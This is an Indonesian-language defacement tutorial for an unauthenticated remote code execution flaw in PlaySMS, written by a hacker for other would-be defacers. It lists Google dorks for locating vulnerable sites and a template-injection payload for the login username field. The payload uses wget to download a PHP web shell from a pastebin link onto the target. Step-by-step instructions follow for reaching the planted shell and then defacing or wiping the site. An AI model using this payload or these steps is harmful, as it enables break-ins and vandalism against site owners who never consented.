PlaySMS Unauthenticated RCE Upload Shell

Ok halo exploiter, kali ini saya akan membagikan tutorial deface PlaySMS Unauthenticated RCE Upload Shell, sudah lama ya gak buat tutorial deface lagi :v. metode deface ini sangat simpel, tanpa basa basi langsung saja ok.

# Google Dork :
- inurl:?app=main intitle:sms
- inurl:?app=main intext:"recover password"
#Payload RCE : 
- {{`wget https://pastebin.com/raw/YH2SJenM -O linuxploit.php`}}

Langkah-Langkah Exploitasi

1. kalian dorking dulu

2. jika sudah menemukan target maka akan muncul tempat login

3. pada bagian username, masukkan payload rce : 
{{`wget https://pastebin.com/raw/YH2SJenM -O linuxploit.php`}}
Note : linuxploit.php bisa kalian ubah dengan nama sesuka kalian 

4. masukkan payload RCE pada username :

5. akses shell : target.com/namashell.php atau target.com/[path]/namashell.php
6. dan boom 

Setelah itu terserah kalian mau di tebas atau titip file doang.
sekian dari saya, semoga bermanfaat

Greetz :
- $lipKn07

Jika Kurang Paham Bisa lihat video dibawah